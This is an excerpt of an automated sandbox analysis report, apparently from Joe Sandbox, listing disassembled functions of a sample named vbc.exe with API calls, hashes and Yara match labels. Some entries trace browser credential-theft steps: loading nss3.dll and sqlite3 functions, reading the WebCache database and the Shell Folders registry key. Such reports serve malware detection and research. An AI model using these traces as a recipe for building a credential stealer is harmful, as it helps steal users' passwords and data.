                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                                                                                                                    • Instruction ID: 6739adb68e03e12f7f7c1d8ccdc83ffe2e18cb8bef7d19e3acfe4a72d1b5eace
                                                                                                                                                    • Opcode Fuzzy Hash: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
                                                                                                                                                    • Instruction Fuzzy Hash: 49C092F02502017EFF208B10AD0AF37695DD780B01F2084207E00E40E0D2A14C008924
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408604 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 6d234507db9eff2efabc180c4569eab15715e06228adb937f803b04aca3214d4
                                                                                                                                                    • Instruction ID: b86fd1081c12c971c14e25096d529e9df9055785cb1c99d48f6af2a57df14557
                                                                                                                                                    • Opcode Fuzzy Hash: 6d234507db9eff2efabc180c4569eab15715e06228adb937f803b04aca3214d4
                                                                                                                                                    • Instruction Fuzzy Hash: D3C09BB15127015BFB345E15D50571273E45F50727F354C1DB4D1D24C2DB7CD4408518
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004084DA Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindClose.KERNELBASE(?,004083EE,?,00000000,00000000,?,00410708,?), ref: 004084E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                    • Opcode ID: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
                                                                                                                                                    • Instruction ID: a26663696ee19f03613d77843e46d9f39b2dea1a9069363f3edb82d48ea13a69
                                                                                                                                                    • Opcode Fuzzy Hash: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
                                                                                                                                                    • Instruction Fuzzy Hash: FFC092346205028BE23C5F38AD5A82A77E0BF4A3313B40F6CA0F3D20F0EB3884428A04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004117E3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
                                                                                                                                                    • Instruction ID: 28a9858cfff7e6e2b1914a1c804994c03dcb5394f8963e6e43683e707f81cfe3
                                                                                                                                                    • Opcode Fuzzy Hash: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
                                                                                                                                                    • Instruction Fuzzy Hash: 83C04C351107028BE7218B12C849753B7F8BB00717F40C818A566859A0D77CE454CE18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411F7E Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,00411EF8,00000000), ref: 00411F8D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                    • Opcode ID: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
                                                                                                                                                    • Instruction ID: 6c621939844f31da33ced499d0f7f7abb962291178acb537878d9391fa7c1b50
                                                                                                                                                    • Opcode Fuzzy Hash: ad90743229005492c5e374903a2f61f35334675862818203282ec323c157130c
                                                                                                                                                    • Instruction Fuzzy Hash: C8C09B32194342BBD7019F508C05F1B7A95BB55703F104C297561940B0C75140549605
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407548 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
                                                                                                                                                    • Instruction ID: 786af1a6681fc588f4ed673612d44b37cd66a9ddadc6b0c90f2aca86fde3c3ed
                                                                                                                                                    • Opcode Fuzzy Hash: 201396fe258989d033aef496f9219e0ec37e2295b66c2c7cdc95f8b8143fc0af
                                                                                                                                                    • Instruction Fuzzy Hash: 41B012792100404BCB080B349C4504D75506F46B32B20473CB073C00F0DB30CD70BA00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411B67 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                    • Opcode ID: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
                                                                                                                                                    • Instruction ID: 8fd1618fdc001f910610ea30bed12e65be45571f6aff6d2ea6de46bc6098db87
                                                                                                                                                    • Opcode Fuzzy Hash: d8bfda6a3cd3cbaaac1923a92569980932abdf526a58af7fc260ebb20eba954b
                                                                                                                                                    • Instruction Fuzzy Hash: F8C09B35544301BFDE114F40FD05F09BF71BB84F05F004414B244640B1C2714414EB17
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004081EA Relevance: 1.4, APIs: 1, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                                                                                                    • free.MSVCRT(?,00000000,?,00000000), ref: 004082B2
                                                                                                                                                      • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                                                                                                                      • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                                                                                                                      • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                                                                                                                      • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$mallocmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3401966785-0
                                                                                                                                                    • Opcode ID: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                                                                                                                    • Instruction ID: 9a294873d4d6790ac16ff047b4da0d243ffe3cbd3c442eed78fe53e82fef6e86
                                                                                                                                                    • Opcode Fuzzy Hash: 2965bb17a7e0c771abc11c43702067ecb1f0b8c1624655e4732796e1fec34586
                                                                                                                                                    • Instruction Fuzzy Hash: 22513672D006099BCB10DF99C5804DEBBB5BB48314F60817FE990B7391DB38AE85CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00419681 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8f1ea4edb21489f0e9da39dbf0cd51e2c4ea33e260fdfc36b72a489d37fc77cd
                                                                                                                                                    • Instruction ID: 4be01e504a1dbe863e5cd1883b5f47abe9c308d3627063d178914d84215e5ed1
                                                                                                                                                    • Opcode Fuzzy Hash: 8f1ea4edb21489f0e9da39dbf0cd51e2c4ea33e260fdfc36b72a489d37fc77cd
                                                                                                                                                    • Instruction Fuzzy Hash: 32319E31614206EFDF14AF15D9517DAB3A0FF00364F11412BF8259B290EB38EDE09BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004059F7 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                    • Opcode ID: 47d81a72ba5e86c6c08ea2f576f41ce6956625c552654a9f8307a541cecd461b
                                                                                                                                                    • Instruction ID: a3dc623871aa55e9e138b6aa735e1cfc4d22eb4fa3c35538bc996f6fefcd79cf
                                                                                                                                                    • Opcode Fuzzy Hash: 47d81a72ba5e86c6c08ea2f576f41ce6956625c552654a9f8307a541cecd461b
                                                                                                                                                    • Instruction Fuzzy Hash: 65113A75600A05AFCB14DF69C9C19ABB7F8FF04314B10463EA456E7241DB34E9458F68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004050B7 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405137: CloseHandle.KERNEL32(000000FF,004050C7,00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF), ref: 0040513F
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF,00000000,00000104), ref: 00405124
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                    • Opcode ID: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
                                                                                                                                                    • Instruction ID: 849b43cde7c86ee220a2fa92f028283b8c7de21471a02e191cd59f19f3ad1342
                                                                                                                                                    • Opcode Fuzzy Hash: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
                                                                                                                                                    • Instruction Fuzzy Hash: DD0181B1815A008AD720AB65DC057A776E8DF11319F10893FE5A5EF2C2EB7C94408E6E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004085EB Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408604: ??3@YAXPAX@Z.MSVCRT ref: 0040860B
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                    • Opcode ID: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
                                                                                                                                                    • Instruction ID: 922d8024f7c410ba2bf811e6c001bae8f16a2ee087a1061d919dd730706e44d9
                                                                                                                                                    • Opcode Fuzzy Hash: 5a3d051f7edf17afde60994ac7c6eb2327cdbc01eacff9d86a6927654e89a2fe
                                                                                                                                                    • Instruction Fuzzy Hash: 36C02B3241D2101FD764FFB4360205722D4CE822383014C2FF0C0D3100DD3884014B4C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408037 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                    • Opcode ID: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                                                                                    • Instruction ID: b2304b4461d9917b15a132db01dd128865174dbe20628525ae7b4e3248e143f9
                                                                                                                                                    • Opcode Fuzzy Hash: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                                                                                    • Instruction Fuzzy Hash: 17C08CB24107018FF7308F11C905322B3E4AF0073BFA08C0EA0D0914C2DBBCD084CA08
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402778 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                    • Opcode ID: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                                                                                                                    • Instruction ID: cac01d1bc301b84fbdbddb48431dcac5afc2edf88536e2650f831a4bf4b80b8a
                                                                                                                                                    • Opcode Fuzzy Hash: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                                                                                                                    • Instruction Fuzzy Hash: 7AC00272550B019FF7609F15C94A762B3E4AF5077BF918C1DA4A5924C1E7BCD4448A18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412B6F Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                    • Opcode ID: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                                                                                                                    • Instruction ID: 46b4f55e9d8111901284769a6e1cf788246b5727949f953e2d9518689c8df02f
                                                                                                                                                    • Opcode Fuzzy Hash: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                                                                                                                    • Instruction Fuzzy Hash: AC900282455501216C4522755D1750511080851176374074A7032A59D1DE688150601C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 00441975 Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004419A0
                                                                                                                                                    • wcscpy.MSVCRT ref: 004419B7
                                                                                                                                                    • memset.MSVCRT ref: 004419EA
                                                                                                                                                    • wcscpy.MSVCRT ref: 00441A00
                                                                                                                                                    • wcscat.MSVCRT ref: 00441A11
                                                                                                                                                    • wcscpy.MSVCRT ref: 00441A37
                                                                                                                                                    • wcscat.MSVCRT ref: 00441A48
                                                                                                                                                    • wcscpy.MSVCRT ref: 00441A6F
                                                                                                                                                    • wcscat.MSVCRT ref: 00441A80
                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                                                                                                                    • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000104,00000000), ref: 00441AB9
                                                                                                                                                    • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000104,00000000), ref: 00441AC7
                                                                                                                                                    • LoadLibraryW.KERNEL32(nss3.dll,?,00000104,00000000), ref: 00441AD7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00441B0C
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00441B19
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00441B26
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00441B33
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00441B40
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00441B4D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00441B5A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                                                                                                                    • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                    • API String ID: 2522319644-522817110
                                                                                                                                                    • Opcode ID: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                                                                                                                    • Instruction ID: 320c17c5e6ace6947bedab1e2bf77c9c6d077df099d9b5840aba930edb5fc244
                                                                                                                                                    • Opcode Fuzzy Hash: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                                                                                                                    • Instruction Fuzzy Hash: 855165B1901709BADB20FFB18D49A4BB7F8AF08704F5008ABE54AE2551E778E644CF18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041604B Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                    • Opcode ID: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                                                                                                                    • Instruction ID: b821822af8fa1f08beba458ee4fa97db6355aebb6f9a48b4278dc6bbcb45c8c8
                                                                                                                                                    • Opcode Fuzzy Hash: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                                                                                                                    • Instruction Fuzzy Hash: 601163F3900118ABDB00EFA4DC899DAB7ACEF19710F454536FA09DB144E674E748C7A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415AFD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415B06
                                                                                                                                                      • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B2D
                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B56
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00415B71
                                                                                                                                                    • free.MSVCRT(?,0044A338,?), ref: 00415B9F
                                                                                                                                                      • Part of subcall function 00414C63: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75145970,?,00414D8E,?), ref: 00414C81
                                                                                                                                                      • Part of subcall function 00414C63: malloc.MSVCRT ref: 00414C88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                    • Opcode ID: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
                                                                                                                                                    • Instruction ID: b695a5953d892c14765524e538430075cec87daac3f875befcc4cde39e80dde6
                                                                                                                                                    • Opcode Fuzzy Hash: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
                                                                                                                                                    • Instruction Fuzzy Hash: 5F118E34A00218BBDB21AFA19C49CDFBF78EF85B51B104067F405A2250D6795B809BA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407E0E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00407E26
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00407E45
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00407E65
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                    • String ID: .$ld@$nss3.dll
                                                                                                                                                    • API String ID: 3541575487-3654816495
                                                                                                                                                    • Opcode ID: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                                                                                                                    • Instruction ID: 78963b1eb2bf7b5f8aa15039180698213c9a680973a94e339c68aae197af375e
